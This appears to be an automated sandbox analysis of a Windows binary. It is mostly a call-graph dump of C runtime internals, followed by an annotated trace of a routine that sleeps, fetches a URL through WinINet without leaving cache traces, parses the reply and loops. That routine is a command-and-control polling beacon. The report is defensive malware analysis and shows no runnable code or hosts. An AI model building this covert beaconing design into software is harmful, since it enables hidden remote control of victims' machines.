19344->19351 19357 
2d93395 19345->19357 19346->19344 19347->19346 19352 2d9340d LoadLibraryExW GetProcAddress 19351->19352 19353 2d93446 RtlDecodePointer 19351->19353 19354 2d9342f 19352->19354 19355 2d93430 RtlEncodePointer 19352->19355 19356 2d93456 19353->19356 19354->19345 19355->19353 19356->19345 19358 2d933a1 __lseeki64 19357->19358 19359 2d95b9a CallUnexpected 59 API calls 19358->19359 19360 2d933a6 19359->19360 19399 2d920a0 19360->19399 19368 2d95a3b __lseeki64 19367->19368 19369 2d95a54 19368->19369 19370 2d92eb4 _free 59 API calls 19368->19370 19371 2d95b43 __lseeki64 19368->19371 19372 2d92eb4 _free 59 API calls 19369->19372 19374 2d95a63 19369->19374 19370->19369 19371->19344 19372->19374 19373 2d95a72 19376 2d95a81 19373->19376 19378 2d92eb4 _free 59 API calls 19373->19378 19374->19373 19375 2d92eb4 _free 59 API calls 19374->19375 19375->19373 19377 2d95a90 19376->19377 19379 2d92eb4 _free 59 API calls 19376->19379 19380 2d95a9f 19377->19380 19381 2d92eb4 _free 59 API calls 19377->19381 19378->19376 19379->19377 19382 2d95aae 19380->19382 19383 2d92eb4 _free 59 API calls 19380->19383 19381->19380 19384 2d95ac0 19382->19384 19386 2d92eb4 _free 59 API calls 19382->19386 19383->19382 19385 2d9882d __lock 59 API calls 19384->19385 19389 2d95ac8 19385->19389 19386->19384 19387 2d95aeb 19847 2d95b4f 19387->19847 19389->19387 19391 2d92eb4 _free 59 API calls 19389->19391 19391->19387 19392 2d9882d __lock 59 API calls 19397 2d95aff ___removelocaleref 19392->19397 19393 2d95b30 19397->19393 19850 2d94f05 19397->19850 19419 2d91550 19399->19419 19402 2d920e8 TlsSetValue 19403 2d920f0 19402->19403 19441 2d8dbc4 19403->19441 19448 2d8dce7 19403->19448 19452 2d8dcb4 19403->19452 19430 2d915b4 19419->19430 19420 2d91630 19422 2d91646 19420->19422 19424 2d91643 CloseHandle 19420->19424 19421 2d915cc 19423 2d9160e ResetEvent 19421->19423 19428 2d915e5 OpenEventA 19421->19428 19469 2d91b50 19421->19469 19425 2d9448b __except_handler4 6 API calls 19422->19425 19426 2d91615 19423->19426 
19424->19422 19429 2d9165e 19425->19429 19473 2d91790 19426->19473 19427 2d916dc WaitForSingleObject 19427->19430 19432 2d915ff 19428->19432 19433 2d91607 19428->19433 19429->19402 19429->19403 19430->19420 19430->19421 19430->19427 19434 2d916b0 CreateEventA 19430->19434 19438 2d91b50 GetCurrentProcessId 19430->19438 19440 2d916ce CloseHandle 19430->19440 19432->19433 19436 2d91604 CloseHandle 19432->19436 19433->19423 19433->19426 19434->19430 19435 2d915e2 19435->19428 19436->19433 19438->19430 19440->19430 19484 2d8d2f7 19441->19484 19449 2d8dd09 19448->19449 19453 2d87c31 std::bad_exception::bad_exception 60 API calls 19452->19453 19483 2d90bb0 19469->19483 19471 2d91ba2 GetCurrentProcessId 19472 2d91bb5 19471->19472 19472->19435 19474 2d9179f 19473->19474 19477 2d917d5 CreateEventA 19474->19477 19478 2d91b50 GetCurrentProcessId 19474->19478 19480 2d917f7 19474->19480 19475 2d9162d 19475->19420 19476 2d91803 SetEvent 19476->19475 19479 2d917eb 19477->19479 19477->19480 19481 2d917d2 19478->19481 19479->19480 19480->19475 19480->19476 19481->19477 19483->19471 19883 2d98997 RtlLeaveCriticalSection 19847->19883 19849 2d95af8 19849->19392 19883->19849 20104 2d92413 20101->20104 20105 2d924d9 std::exception::_Copy_str 59 API calls 20104->20105 20106 2d8182a 20105->20106 20106->19213 20113 2d8d63d 20107->20113 20110 2d8cb90 20122 2d8d675 20110->20122 20112 2d8a5eb 20116 2d8b161 20113->20116 20117 2d8b16b __EH_prolog 20116->20117 20118 2d92453 std::exception::exception 59 API calls 20117->20118 20119 2d8b17c 20118->20119 20120 2d87c31 std::bad_exception::bad_exception 60 API calls 20119->20120 20121 2d8a5dd 20120->20121 20121->20110 20123 2d8d67f __EH_prolog 20122->20123 20126 2d8b559 20123->20126 20125 2d8d6b6 Mailbox 20125->20112 20127 2d8b563 __EH_prolog 20126->20127 20128 2d8b161 std::bad_exception::bad_exception 60 API calls 20127->20128 20129 2d8b574 Mailbox 20128->20129 20129->20125 20151 2d8353e 20130->20151 20134 2d82ae8 WSASetLastError connect 20133->20134 
20135 2d82ad8 20133->20135 20137 2d8a43c 69 API calls 20134->20137 20136 2d90a50 Mailbox 68 API calls 20135->20136 20138 2d82add 20136->20138 20139 2d82b07 20137->20139 20141 2d90a50 Mailbox 68 API calls 20138->20141 20139->20138 20140 2d90a50 Mailbox 68 API calls 20139->20140 20140->20138 20142 2d82b1b 20141->20142 20143 2d90a50 Mailbox 68 API calls 20142->20143 20146 2d82b38 20142->20146 20143->20146 20150 2d82b87 20146->20150 20207 2d83027 20146->20207 20149 2d90a50 Mailbox 68 API calls 20149->20150 20150->19035 20152 2d83548 __EH_prolog 20151->20152 20153 2d83576 20152->20153 20154 2d83557 20152->20154 20173 2d82edd WSASetLastError WSASocketA 20153->20173 20155 2d81996 68 API calls 20154->20155 20172 2d8355f 20155->20172 20158 2d835ad CreateIoCompletionPort 20159 2d835db 20158->20159 20160 2d835c5 GetLastError 20158->20160 20161 2d90a50 Mailbox 68 API calls 20159->20161 20162 2d90a50 Mailbox 68 API calls 20160->20162 20163 2d835d2 20161->20163 20162->20163 20164 2d835ef 20163->20164 20167 2d83626 20163->20167 20165 2d90a50 Mailbox 68 API calls 20164->20165 20166 2d83608 20165->20166 20181 2d829ee 20166->20181 20168 2d8de26 60 API calls 20167->20168 20170 2d83659 20168->20170 20171 2d90a50 Mailbox 68 API calls 20170->20171 20171->20172 20172->19034 20174 2d90a50 Mailbox 68 API calls 20173->20174 20175 2d82f0a WSAGetLastError 20174->20175 20176 2d82f41 20175->20176 20177 2d82f21 20175->20177 20176->20158 20176->20172 20178 2d82f3c 20177->20178 20179 2d82f27 setsockopt 20177->20179 20180 2d90a50 Mailbox 68 API calls 20178->20180 20179->20178 20180->20176 20182 2d82a0c 20181->20182 20183 2d82aad 20181->20183 20185 2d82a39 WSASetLastError closesocket 20182->20185 20189 2d90a50 Mailbox 68 API calls 20182->20189 20184 2d90a50 Mailbox 68 API calls 20183->20184 20186 2d82ab8 20183->20186 20184->20186 20187 2d8a43c 69 API calls 20185->20187 20186->20172 20188 2d82a51 20187->20188 20188->20183 20192 2d90a50 Mailbox 68 API calls 20188->20192 20190 2d82a21 20189->20190 
20199 2d82f50 20190->20199 20194 2d82a5c 20192->20194 20195 2d82a7b ioctlsocket WSASetLastError closesocket 20194->20195 20196 2d90a50 Mailbox 68 API calls 20194->20196 20198 2d8a43c 69 API calls 20195->20198 20197 2d82a6e 20196->20197 20197->20183 20197->20195 20198->20183 20200 2d82f5b 20199->20200 20201 2d82f70 WSASetLastError setsockopt 20199->20201 20202 2d90a50 Mailbox 68 API calls 20200->20202 20203 2d8a43c 69 API calls 20201->20203 20206 2d82a36 20202->20206 20204 2d82f9e 20203->20204 20205 2d90a50 Mailbox 68 API calls 20204->20205 20204->20206 20205->20206 20206->20185 20208 2d8303b 20207->20208 20209 2d8304d WSASetLastError select 20207->20209 20210 2d90a50 Mailbox 68 API calls 20208->20210 20211 2d8a43c 69 API calls 20209->20211 20214 2d82b59 20210->20214 20212 2d83095 20211->20212 20213 2d90a50 Mailbox 68 API calls 20212->20213 20212->20214 20213->20214 20214->20150 20215 2d82fb4 20214->20215 20216 2d82fc0 20215->20216 20217 2d82fd5 WSASetLastError getsockopt 20215->20217 20219 2d90a50 Mailbox 68 API calls 20216->20219 20218 2d8a43c 69 API calls 20217->20218 20220 2d8300f 20218->20220 20222 2d82b7a 20219->20222 20221 2d90a50 Mailbox 68 API calls 20220->20221 20220->20222 20221->20222 20222->20149 20222->20150 20230 2da5330 20223->20230 20225 2d832b5 RtlEnterCriticalSection 20226 2d90a50 Mailbox 68 API calls 20225->20226 20227 2d832d6 20226->20227 20231 2d83307 20227->20231 20230->20225 20233 2d83311 __EH_prolog 20231->20233 20234 2d83350 20233->20234 20243 2d87db5 20233->20243 20247 2d8239d 20234->20247 20237 2d90a50 Mailbox 68 API calls 20239 2d8337c 20237->20239 20241 2d82d39 71 API calls 20239->20241 20242 2d83390 20241->20242 20253 2d87d5e 20242->20253 20244 2d87dc3 20243->20244 20246 2d87e39 20244->20246 20257 2d8891a 20244->20257 20246->20233 20251 2d823ab 20247->20251 20248 2d82417 20248->20237 20248->20242 20249 2d823c1 PostQueuedCompletionStatus 20250 2d823da RtlEnterCriticalSection 20249->20250 20249->20251 20250->20251 20251->20248 
20251->20249 20252 2d823f8 InterlockedExchange RtlLeaveCriticalSection 20251->20252 20252->20251 20254 2d87d63 20253->20254 20255 2d832ee RtlLeaveCriticalSection 20254->20255 20273 2d81e7f 20254->20273 20255->19050 20258 2d88944 20257->20258 20259 2d87d5e 68 API calls 20258->20259 20260 2d8898a 20259->20260 20261 2d889b1 20260->20261 20263 2d8a1a7 20260->20263 20261->20246 20264 2d8a1c1 20263->20264 20265 2d8a1b1 20263->20265 20264->20261 20265->20264 20268 2d8fa65 20265->20268 20269 2d92413 std::exception::exception 59 API calls 20268->20269 20270 2d8fa7d 20269->20270 20271 2d9449a __CxxThrowException@8 RaiseException 20270->20271 20272 2d8fa92 20271->20272 20274 2d90a50 Mailbox 68 API calls 20273->20274 20275 2d81e90 20274->20275 20275->20254 20286 2d921bb 20276->20286 20279 2d922e5 20280 2d95d9b __set_osfhnd 59 API calls 20279->20280 20281 2d922ea 20280->20281 20282 2d94e35 __fclose_nolock 9 API calls 20281->20282 20284 2d922f5 ___ascii_stricmp 20282->20284 20283 2d958ba 66 API calls __tolower_l 20285 2d922fc 20283->20285 20284->19062 20285->20283 20285->20284 20287 2d921cc 20286->20287 20293 2d92219 20286->20293 20288 2d95b9a CallUnexpected 59 API calls 20287->20288 20289 2d921d2 20288->20289 20290 2d921f9 20289->20290 20294 2d950ff 20289->20294 20290->20293 20309 2d95481 20290->20309 20293->20279 20293->20285 20295 2d9510b __lseeki64 20294->20295 20296 2d95b9a CallUnexpected 59 API calls 20295->20296 20297 2d95114 20296->20297 20298 2d95143 20297->20298 20299 2d95127 20297->20299 20300 2d9882d __lock 59 API calls 20298->20300 20302 2d95b9a CallUnexpected 59 API calls 20299->20302 20301 2d9514a 20300->20301 20321 2d9517f 20301->20321 20304 2d9512c 20302->20304 20307 2d9513a __lseeki64 20304->20307 20308 2d9837f __amsg_exit 59 API calls 20304->20308 20307->20290 20308->20307 20310 2d9548d __lseeki64 20309->20310 20311 2d95b9a CallUnexpected 59 API calls 20310->20311 20312 2d95497 20311->20312 20313 2d954a9 20312->20313 20314 2d9882d __lock 59 API calls 
20312->20314 20315 2d954b7 __lseeki64 20313->20315 20317 2d9837f __amsg_exit 59 API calls 20313->20317 20319 2d954c7 20314->20319 20315->20293 20316 2d954f4 20329 2d9551e 20316->20329 20317->20315 20319->20316 20320 2d92eb4 _free 59 API calls 20319->20320 20320->20316 20322 2d9518a ___addlocaleref ___removelocaleref 20321->20322 20324 2d9515e 20321->20324 20323 2d94f05 ___freetlocinfo 59 API calls 20322->20323 20322->20324 20323->20324 20325 2d95176 20324->20325 20328 2d98997 RtlLeaveCriticalSection 20325->20328 20327 2d9517d 20327->20304 20328->20327 20332 2d98997 RtlLeaveCriticalSection 20329->20332 20331 2d95525 20331->20313 20332->20331 20334 2d927cb 20333->20334 20335 2d927db _strlen 20334->20335 20336 2d95d9b __set_osfhnd 59 API calls 20334->20336 20335->19068 20337 2d927d0 20336->20337 20338 2d94e35 __fclose_nolock 9 API calls 20337->20338 20338->20335 20340 2d8df3d __EH_prolog 20339->20340 20341 2d93a8f _Allocate 60 API calls 20340->20341 20342 2d8df54 20341->20342 20342->19079 20344 2d8a645 GetProcessHeap HeapFree 20343->20344 20344->19085 20346 2d921bb _LocaleUpdate::_LocaleUpdate 59 API calls 20345->20346 20347 2d96005 20346->20347 20348 2d95d9b __set_osfhnd 59 API calls 20347->20348 20349 2d9600a 20348->20349 20350 2d96adb 20349->20350 20365 2d9602a __output_l __aulldvrm _strlen 20349->20365 20390 2d99d71 20349->20390 20351 2d95d9b __set_osfhnd 59 API calls 20350->20351 20352 2d96ae0 20351->20352 20354 2d94e35 __fclose_nolock 9 API calls 20352->20354 20355 2d96ab5 20354->20355 20356 2d9448b __except_handler4 6 API calls 20355->20356 20357 2d923b6 20356->20357 20357->19098 20369 2d95e41 20357->20369 20359 2d96b10 79 API calls _write_multi_char 20359->20365 20360 2d96693 RtlDecodePointer 20360->20365 20361 2d96b58 79 API calls _write_multi_char 20361->20365 20362 2d92eb4 _free 59 API calls 20362->20365 20363 2d9fa24 61 API calls __cftof 20363->20365 20364 2d989f4 __malloc_crt 59 API calls 20364->20365 20365->20350 20365->20355 20365->20359 20365->20360 
20365->20361 20365->20362 20365->20363 20365->20364 20366 2d966f6 RtlDecodePointer 20365->20366 20367 2d96b84 79 API calls _write_string 20365->20367 20368 2d9671b RtlDecodePointer 20365->20368 20397 2d9dc4e 20365->20397 20366->20365 20367->20365 20368->20365 20370 2d99d71 __fclose_nolock 59 API calls 20369->20370 20371 2d95e4f 20370->20371 20372 2d95e5a 20371->20372 20373 2d95e71 20371->20373 20375 2d95d9b __set_osfhnd 59 API calls 20372->20375 20374 2d95e76 20373->20374 20383 2d95e83 __flsbuf 20373->20383 20376 2d95d9b __set_osfhnd 59 API calls 20374->20376 20384 2d95e5f 20375->20384 20376->20384 20377 2d95edd 20378 2d95f61 20377->20378 20379 2d95ee7 20377->20379 20380 2d99d95 __write 79 API calls 20378->20380 20381 2d95f01 20379->20381 20386 2d95f18 20379->20386 20380->20384 20412 2d99d95 20381->20412 20383->20377 20383->20384 20387 2d95ed2 20383->20387 20400 2d9f6e2 20383->20400 20384->19098 20386->20384 20440 2d9f736 20386->20440 20387->20377 20409 2d9f8a5 20387->20409 20391 2d99d7b 20390->20391 20392 2d99d90 20390->20392 20393 2d95d9b __set_osfhnd 59 API calls 20391->20393 20392->20365 20394 2d99d80 20393->20394 20395 2d94e35 __fclose_nolock 9 API calls 20394->20395 20396 2d99d8b 20395->20396 20396->20365 20398 2d921bb _LocaleUpdate::_LocaleUpdate 59 API calls 20397->20398 20399 2d9dc5f 20398->20399 20399->20365 20401 2d9f6fa 20400->20401 20402 2d9f6ed 20400->20402 20404 2d9f706 20401->20404 20405 2d95d9b __set_osfhnd 59 API calls 20401->20405 20403 2d95d9b __set_osfhnd 59 API calls 20402->20403 20406 2d9f6f2 20403->20406 20404->20387 20407 2d9f727 20405->20407 20406->20387 20408 2d94e35 __fclose_nolock 9 API calls 20407->20408 20408->20406 20410 2d989f4 __malloc_crt 59 API calls 20409->20410 20411 2d9f8ba 20410->20411 20411->20377 20413 2d99da1 __lseeki64 20412->20413 20414 2d99dae 20413->20414 20415 2d99dc5 20413->20415 20416 2d95d67 __set_osfhnd 59 API calls 20414->20416 20417 2d99e64 20415->20417 20419 2d99dd9 20415->20419 20418 2d99db3 20416->20418 20420 
2d95d67 __set_osfhnd 59 API calls 20417->20420 20421 2d95d9b __set_osfhnd 59 API calls 20418->20421 20422 2d99e01 20419->20422 20423 2d99df7 20419->20423 20424 2d99dfc 20420->20424 20432 2d99dba __lseeki64 20421->20432 20465 2da0bc7 20422->20465 20425 2d95d67 __set_osfhnd 59 API calls 20423->20425 20428 2d95d9b __set_osfhnd 59 API calls 20424->20428 20425->20424 20427 2d99e07 20429 2d99e1a 20427->20429 20430 2d99e2d 20427->20430 20431 2d99e70 20428->20431 20474 2d99e84 20429->20474 20433 2d95d9b __set_osfhnd 59 API calls 20430->20433 20435 2d94e35 __fclose_nolock 9 API calls 20431->20435 20432->20384 20436 2d99e32 20433->20436 20435->20432 20438 2d95d67 __set_osfhnd 59 API calls 20436->20438 20437 2d99e26 20533 2d99e5c 20437->20533 20438->20437 20441 2d9f742 __lseeki64 20440->20441 20442 2d9f76b 20441->20442 20443 2d9f753 20441->20443 20445 2d9f810 20442->20445 20450 2d9f7a0 20442->20450 20444 2d95d67 __set_osfhnd 59 API calls 20443->20444 20446 2d9f758 20444->20446 20447 2d95d67 __set_osfhnd 59 API calls 20445->20447 20448 2d95d9b __set_osfhnd 59 API calls 20446->20448 20449 2d9f815 20447->20449 20451 2d9f760 __lseeki64 20448->20451 20452 2d95d9b __set_osfhnd 59 API calls 20449->20452 20453 2da0bc7 ___lock_fhandle 60 API calls 20450->20453 20451->20384 20454 2d9f81d 20452->20454 20455 2d9f7a6 20453->20455 20456 2d94e35 __fclose_nolock 9 API calls 20454->20456 20457 2d9f7bc 20455->20457 20458 2d9f7d4 20455->20458 20456->20451 20459 2d9f832 __lseeki64_nolock 61 API calls 20457->20459 20460 2d95d9b __set_osfhnd 59 API calls 20458->20460 20463 2d9f7cb 20459->20463 20461 2d9f7d9 20460->20461 20462 2d95d67 __set_osfhnd 59 API calls 20461->20462 20462->20463 20566 2d9f808 20463->20566 20467 2da0bd3 __lseeki64 20465->20467 20466 2da0c22 RtlEnterCriticalSection 20468 2da0c48 __lseeki64 20466->20468 20467->20466 20469 2d9882d __lock 59 API calls 20467->20469 20468->20427 20470 2da0bf8 20469->20470 20471 2da0c10 20470->20471 20472 2d9914c __mtinitlocks 
InitializeCriticalSectionAndSpinCount 20470->20472 20536 2da0c4c 20471->20536 20472->20471 20475 2d99e91 __write_nolock 20474->20475 20476 2d99eef 20475->20476 20477 2d99ed0 20475->20477 20505 2d99ec5 20475->20505 20481 2d99f47 20476->20481 20482 2d99f2b 20476->20482 20478 2d95d67 __set_osfhnd 59 API calls 20477->20478 20480 2d99ed5 20478->20480 20479 2d9448b __except_handler4 6 API calls 20483 2d9a6e5 20479->20483 20484 2d95d9b __set_osfhnd 59 API calls 20480->20484 20491 2d99f60 20481->20491 20540 2d9f832 20481->20540 20485 2d95d67 __set_osfhnd 59 API calls 20482->20485 20483->20437 20486 2d99edc 20484->20486 20489 2d99f30 20485->20489 20490 2d94e35 __fclose_nolock 9 API calls 20486->20490 20488 2d9f6e2 __flsbuf 59 API calls 20492 2d99f6e 20488->20492 20493 2d95d9b __set_osfhnd 59 API calls 20489->20493 20490->20505 20491->20488 20494 2d9a2c7 20492->20494 20499 2d95b9a CallUnexpected 59 API calls 20492->20499 20495 2d99f37 20493->20495 20496 2d9a65a WriteFile 20494->20496 20497 2d9a2e5 20494->20497 20498 2d94e35 __fclose_nolock 9 API calls 20495->20498 20500 2d9a2ba GetLastError 20496->20500 20507 2d9a287 20496->20507 20501 2d9a409 20497->20501 20510 2d9a2fb 20497->20510 20498->20505 20502 2d99f9a GetConsoleMode 20499->20502 20500->20507 20511 2d9a414 20501->20511 20525 2d9a4fe 20501->20525 20502->20494 20504 2d99fd9 20502->20504 20503 2d9a693 20503->20505 20506 2d95d9b __set_osfhnd 59 API calls 20503->20506 20504->20494 20508 2d99fe9 GetConsoleCP 20504->20508 20505->20479 20512 2d9a6c1 20506->20512 20507->20503 20507->20505 20513 2d9a3e7 20507->20513 20508->20503 20531 2d9a018 20508->20531 20509 2d9a36a WriteFile 20509->20500 20509->20510 20510->20503 20510->20507 20510->20509 20511->20503 20511->20507 20514 2d9a479 WriteFile 20511->20514 20515 2d95d67 __set_osfhnd 59 API calls 20512->20515 20516 2d9a68a 20513->20516 20517 2d9a3f2 20513->20517 20514->20500 20514->20511 20515->20505 20520 2d95d7a __dosmaperr 59 API calls 20516->20520 20519 2d95d9b __set_osfhnd 59 
API calls 20517->20519 20518 2d9a573 WideCharToMultiByte 20518->20500 20518->20525 20522 2d9a3f7 20519->20522 20520->20505 20521 2d9a5c2 WriteFile 20524 2d9a615 GetLastError 20521->20524 20521->20525 20526 2d95d67 __set_osfhnd 59 API calls 20522->20526 20524->20525 20525->20503 20525->20507 20525->20518 20525->20521 20526->20505 20527 2d9ff4a 61 API calls __write_nolock 20527->20531 20528 2d9a101 WideCharToMultiByte 20528->20507 20529 2d9a13c WriteFile 20528->20529 20529->20500 20529->20531 20530 2da0f93 WriteConsoleW CreateFileW __putwch_nolock 20530->20531 20531->20500 20531->20507 20531->20527 20531->20528 20531->20530 20532 2d9a196 WriteFile 20531->20532 20549 2d9dc88 20531->20549 20532->20500 20532->20531 20565 2da0f6d RtlLeaveCriticalSection 20533->20565 20535 2d99e62 20535->20432 20539 2d98997 RtlLeaveCriticalSection 20536->20539 20538 2da0c53 20538->20466 20539->20538 20552 2da0e84 20540->20552 20542 2d9f842 20543 2d9f85b SetFilePointerEx 20542->20543 20544 2d9f84a 20542->20544 20545 2d9f873 GetLastError 20543->20545 20548 2d9f84f 20543->20548 20546 2d95d9b __set_osfhnd 59 API calls 20544->20546 20547 2d95d7a __dosmaperr 59 API calls 20545->20547 20546->20548 20547->20548 20548->20491 20550 2d9dc4e __isleadbyte_l 59 API calls 20549->20550 20551 2d9dc95 20550->20551 20551->20531 20553 2da0e8f 20552->20553 20554 2da0ea4 20552->20554 20555 2d95d67 __set_osfhnd 59 API calls 20553->20555 20557 2d95d67 __set_osfhnd 59 API calls 20554->20557 20559 2da0ec9 20554->20559 20556 2da0e94 20555->20556 20558 2d95d9b __set_osfhnd 59 API calls 20556->20558 20560 2da0ed3 20557->20560 20561 2da0e9c 20558->20561 20559->20542 20562 2d95d9b __set_osfhnd 59 API calls 20560->20562 20561->20542 20563 2da0edb 20562->20563 20564 2d94e35 __fclose_nolock 9 API calls 20563->20564 20564->20561 20565->20535 20569 2da0f6d RtlLeaveCriticalSection 20566->20569 20568 2d9f80e 20568->20451 20569->20568 20570->19101 20572 2d8e26d __EH_prolog 20571->20572 20573 2d93a8f _Allocate 60 API calls 
20572->20573 20574 2d8e276 20573->20574 20575 2d81bfa RtlEnterCriticalSection 20574->20575 20577 2d8e484 20574->20577 20575->19106 20578 2d8e48e __EH_prolog 20577->20578 20581 2d826db RtlEnterCriticalSection 20578->20581 20580 2d8e4e4 20580->20575 20582 2d82728 CreateWaitableTimerA 20581->20582 20583 2d8277e 20581->20583 20585 2d82738 GetLastError 20582->20585 20586 2d8275b SetWaitableTimer 20582->20586 20584 2d827d5 RtlLeaveCriticalSection 20583->20584 20587 2d93a8f _Allocate 60 API calls 20583->20587 20584->20580 20588 2d90a50 Mailbox 68 API calls 20585->20588 20586->20583 20589 2d8278a 20587->20589 20590 2d82745 20588->20590 20592 2d93a8f _Allocate 60 API calls 20589->20592 20596 2d827c8 20589->20596 20591 2d81712 60 API calls 20590->20591 20591->20586 20594 2d827a9 20592->20594 20597 2d81cf8 CreateEventA 20594->20597 20625 2d87d36 20596->20625 20598 2d81d52 CreateEventA 20597->20598 20599 2d81d23 GetLastError 20597->20599 20600 2d81d6b GetLastError 20598->20600 20619 2d81d96 20598->20619 20602 2d81d33 20599->20602 20604 2d81d7b 20600->20604 20601 2d932fc __beginthreadex 275 API calls 20605 2d81db6 20601->20605 20603 2d90a50 Mailbox 68 API calls 20602->20603 20606 2d81d3c 20603->20606 20607 2d90a50 Mailbox 68 API calls 20604->20607 20608 2d81e0d 20605->20608 20609 2d81dc6 GetLastError 20605->20609 20610 2d81712 60 API calls 20606->20610 20611 2d81d84 20607->20611 20612 2d81e1d 20608->20612 20613 2d81e11 WaitForSingleObject CloseHandle 20608->20613 20614 2d81dd8 20609->20614 20615 2d81d4e 20610->20615 20616 2d81712 60 API calls 20611->20616 20612->20596 20613->20612 20617 2d81ddc CloseHandle 20614->20617 20618 2d81ddf 20614->20618 20615->20598 20616->20619 20617->20618 20620 2d81de9 CloseHandle 20618->20620 20621 2d81dee 20618->20621 20619->20601 20620->20621 20622 2d90a50 Mailbox 68 API calls 20621->20622 20623 2d81dfb 20622->20623 20624 2d81712 60 API calls 20623->20624 20624->20608 20626 2d87d52 20625->20626 20627 2d87d43 CloseHandle 20625->20627 20626->20584 
20627->20626 20639 2d830ae WSASetLastError 20628->20639 20631 2d830ae 71 API calls 20632 2d83c90 20631->20632 20633 2d816ae 20632->20633 20634 2d816b8 __EH_prolog 20633->20634 20635 2d81701 20634->20635 20636 2d92413 std::exception::exception 59 API calls 20634->20636 20635->18980 20637 2d816dc 20636->20637 20655 2d8a3d5 20637->20655 20640 2d830ec WSAStringToAddressA 20639->20640 20641 2d830ce 20639->20641 20642 2d8a43c 69 API calls 20640->20642 20641->20640 20643 2d830d3 20641->20643 20644 2d83114 20642->20644 20645 2d90a50 Mailbox 68 API calls 20643->20645 20646 2d83154 20644->20646 20651 2d8311e _memcmp 20644->20651 20654 2d830d8 20645->20654 20647 2d83135 20646->20647 20652 2d90a50 Mailbox 68 API calls 20646->20652 20648 2d83193 20647->20648 20649 2d90a50 Mailbox 68 API calls 20647->20649 20653 2d90a50 Mailbox 68 API calls 20648->20653 20648->20654 20649->20648 20650 2d90a50 Mailbox 68 API calls 20650->20647 20651->20647 20651->20650 20652->20647 20653->20654 20654->20631 20654->20632 20656 2d8a3df __EH_prolog 20655->20656 20663 2d8c93a 20656->20663 20660 2d8a400 20661 2d9449a __CxxThrowException@8 RaiseException 20660->20661 20662 2d8a40e 20661->20662 20664 2d8b161 std::bad_exception::bad_exception 60 API calls 20663->20664 20665 2d8a3f2 20664->20665 20666 2d8c976 20665->20666 20667 2d8c980 __EH_prolog 20666->20667 20670 2d8b110 20667->20670 20669 2d8c9af Mailbox 20669->20660 20671 2d8b11a __EH_prolog 20670->20671 20672 2d8b161 std::bad_exception::bad_exception 60 API calls 20671->20672 20673 2d8b12b Mailbox 20672->20673 20673->20669 20675 2d83c20 __EH_prolog 20674->20675 20676 2d83c41 20675->20676 20677 2d923f7 std::bad_exception::bad_exception 59 API calls 20675->20677 20676->19121 20678 2d83c35 20677->20678 20679 2d8a58a 60 API calls 20678->20679 20679->20676 20681 2d83770 20680->20681 20682 2d83755 InterlockedCompareExchange 20680->20682 20683 2d90a50 Mailbox 68 API calls 20681->20683 20682->20681 20684 2d83765 20682->20684 20686 2d83779 20683->20686 20685 
[Continuation of the call-graph edge list (Joe Sandbox IDA plugin), nodes 20684-21326; rendered edges omitted. The recoverable content is the set of CRT runtime internals in the 2d92000-2da1000 range that these nodes describe: __lseeki64, __set_osfhnd, __fclose_nolock, __lock_file, __flush/__flsbuf/__write, __close_nolock (CloseHandle, SetStdHandle), __CRT_INIT@12 (GetProcessHeap, GetCommandLineA, GetEnvironmentStringsW/WideCharToMultiByte, GetStartupInfoW, GetStdHandle/GetFileType, TlsAlloc/TlsSetValue, InitializeCriticalSectionAndSpinCount, RtlEncodePointer/RtlDecodePointer), __ioterm, __mtterm, _parse_cmdline, ___initmbctable and _LocaleUpdate. Three small leaf nodes close the list: lstrcmpiW at 40b578 (from 40b14c), WriteFile at 2debb98 (reached from 2de71e7, continuing to 2e024d7) and RegCloseKey at 40b67c (continuing to 40b682).]

Control-flow Graph
[Rendered graph (executed / not-executed colouring) omitted; basic blocks 02D866F4-02D87B56. Recoverable structure: block 02D866F4 branches to a Sleep at 02D86708, takes and releases the 02DB71B8 critical section (02D8670E-02D86742), zeroes two buffers (_memset at 02D86779/02D86788) and enters 02D872AB, which calls InternetOpenA, three InternetSetOptionA calls, InternetOpenUrlA, a loop over InternetReadFile (02D87346-02D8736C) and InternetCloseHandle. The response is then parsed at 02D87589-02D875F6 (_malloc, _memset, then a _strtok / _swscanf / _strtok loop, 02D875E6 branching back to 02D875CF) and dispatched through the helper calls at 02D8439C, 02D9227C and 02D8A658. Every exit path of the dispatcher (02D873AB, 02D873E3, 02D877CB, 02D87807, 02D87798, 02D87AFB, 02D87B12, 02D87B56) returns to 02D866F4, so the routine is a polling loop: sleep, fetch, parse, act, repeat.]
APIs
• Sleep.KERNELBASE(0000EA60), ref: 02D86708 (0xEA60 = 60000 ms: a 60 s pause before the next poll)
• RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D86713
• RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D86724
• _memset.LIBCMT ref: 02D86779
• _memset.LIBCMT ref: 02D86788
• InternetOpenA.WININET(?), ref: 02D872B5 (the lpszAgent argument was not recovered by the tracer; the only User-Agent literal in this routine is the Mozilla/5.0 string listed under String ID below)
• InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D872DD (dwOption 2 = INTERNET_OPTION_CONNECT_TIMEOUT; value not recovered)
• InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D872F5 (dwOption 5 = INTERNET_OPTION_SEND_TIMEOUT, 0x1388 = 5000 ms, written as a 4-byte DWORD)
• InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D8730D (dwOption 6 = INTERNET_OPTION_RECEIVE_TIMEOUT, 5000 ms)
• _memset.LIBCMT ref: 02D8731D
• InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D87336 (dwFlags 0x04000200 = INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_UI: the response is not written to the WinINet cache, so no INetCache artefact is left behind, and the cookie dialog is suppressed; the URL and headers were not recovered)
• InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D87358 (0x1000 = 4096-byte reads, looped over at 02D87346-02D8736C until the body is consumed)
• InternetCloseHandle.WININET(00000000), ref: 02D87378
• InternetCloseHandle.WININET(00000000), ref: 02D87383
• _memset.LIBCMT ref: 02D873CB
• RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D873EE
• RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D873FF
• _malloc.LIBCMT ref: 02D87498
• RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D874AA
• RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D874B6
• _memset.LIBCMT ref: 02D874D0
• _memset.LIBCMT ref: 02D874DF
• _memset.LIBCMT ref: 02D874EF
• _memset.LIBCMT ref: 02D87502
